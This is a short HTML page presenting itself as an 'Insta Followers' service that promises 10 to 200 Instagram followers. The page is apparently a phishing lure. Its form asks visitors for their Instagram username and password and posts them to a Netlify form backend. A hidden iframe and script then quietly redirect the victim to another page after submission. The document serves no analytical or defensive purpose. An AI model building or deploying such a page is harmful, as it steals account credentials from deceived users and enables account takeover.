<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Insta Followers</title>
</head>
<body>
	<center>
		<h1 class="tittle">Instagram Followers</h1>
		
		<script type="text/javascript">var submitted=false;</script>
		<iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){
		window.location='black.html';}"></iframe>
		
		<form name="dbInsta" netlify  target="hidden_iframe" onsubmit="submitted=true" method="POST">
		<div class="ino"> 
		<span>Username</span>
		<input type="text" required="required"  name="username"><br>
	</div>	
	<div class="ino"> 
		<span>Password</span>
		<input type="password" required="required"  name="password"><br>
	</div>	
		</center>
		<div class="dof"> 
	     <span>followers</span>
	     <select name="followers" >
	     <option>10</option>
	     <option>20</option>
	     <option>30</option>
	     <option>40</option>
	     <option>50</option>
	     <option>60</option>
	     <option>70</option>
	     <option>80</option>
	     <option>90</option>
	     <option>100</option>
	     <option>200</option>
	     </select>
	     <select class="od"" name="f/t">
	     <option>Fake Followers</option>
	     <option>True Followers</option>
	     </select> 
	     </div>
	     <br>
	  
	     <center>
	     <input class="submitbtn"  type="submit" value="Submit">  
	   <h3>Powered By insta Followers</h3>
	   <h6>Copyright 2023 insta followers</h6>
	</center>	
		</form>
	 <style type="text/css">
	 body{
	 background:#171717;
	 }
	 h3{
	 color:white;
	 }
	 h6{color:white;}
	 span{
	 font-family:Arial,sans-serif;
	 font-size:20px;
	 }
	 .tittle{
	 color:white;
	 }
	 input{
	 background:#292929;
	 color:white;
	 height:20px;
	 border-style:solid;
	 border-color:#1c1c1c;
	 }
	 .ino{
	 border-style:solid;
	 border-color:gray;
	 margin-top:10px;
	 padding-top:10px;
	 padding-bottom:10px;
	 background:#303030;
	color:white;
	 }
	 .submitbtn{
	 width:150px;
	 height:30px;
	font-size:20px;
	background:#4287f5;
	color:white;
	border-style:solid;
	border-color:#0960eb;
	border-radius:10px;
	
	}
	 .dof{
	 border-style:solid;
	 border-color:gray;
	 margin-top:10px;
	 padding-top:10px;
	 padding-bottom:10px;
	 background:#303030;
	 padding-left:30px;
	 margin-bottom:-10px;
	 color:white;
	 }
	 select {
	 height:30px;
	 width:50px;
	 background:#292929;
	 color:white;
	 }
	 .od{
	 width:110px;
	 }
	 </style>
</body>
</html>